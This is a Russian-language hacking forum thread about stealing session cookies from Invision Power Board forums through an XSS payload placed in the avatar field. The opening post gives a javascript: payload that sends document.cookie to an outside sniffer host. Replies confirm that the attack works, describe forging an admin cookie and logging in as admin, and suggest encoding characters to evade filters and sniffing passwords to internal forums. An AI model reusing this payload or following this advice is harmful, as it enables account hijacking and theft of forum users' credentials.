че за бред !!!!!!! пишу :
javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif
мне говорит :
Не выбрано ни одного аватара. Вернитесь назад и исправьте ошибку. !!!!!!!!!!!!!!!!!
версия форума - v2.1.6
пробол в 2.14 тож непашет !!!!!!!!!!!!!!!!!!!

Для 2.1.4 есть другая уязвимость на форум античата.Поисчи и попробуй на 2.1.6..

Через аватар реально работает
Но стырил куки, подделал, зашел как админ, ..... что дальше?

А ничего
Соль не даст расшифровать.
Кстати...
Подмена странички работает через аватару?
По идее должна. Не проверял.

Вот в коде img.src = "http://" Заменю ссылку на свой снифер и используй куки. Если фильтрует кавычки и т.д,то используй программу URI crypter, чтобы закодировать те символы которые фильтруються!

__________________
-=Ok let's Go=-
-=OpenVPN=-

я ж говорю, через аватар работает. На данный момент у меня есть подделанный куки админа форума, но расшифровать куки без соли нельзя, вопрос в другом, можно ли каким-нибудь образом использовать то, что логинюсь под админом? хоть какие идеи есть?

Например, можно ли как-нибудь использовать права админа на добавление в календарь какого-нить события и т.д.

Думаю да.
Можно ещё отсниффать пароли к внутренним форумам и полазать по ним.
Зависит от настроек форума.

Ну а как тогда быть, если нет возможности загрузить аватар с другого адреса?
Если ацкий админ выключил в админке эту возможность?

Ладно пацан я хочу тебе сказать что существует сайт который как-раз подходит к решению и к решению любой проблемы связаной с Уязвимостью . Этот сайт называется securityfocus.
Зайди сюда:http://www.securityfocus.com/vulnerabilities
найди invision power services потом в нижнем окне напиши invision power board и вследущем окне выбири версию форума.

Надеюсь я тебе помог.
dracula4ever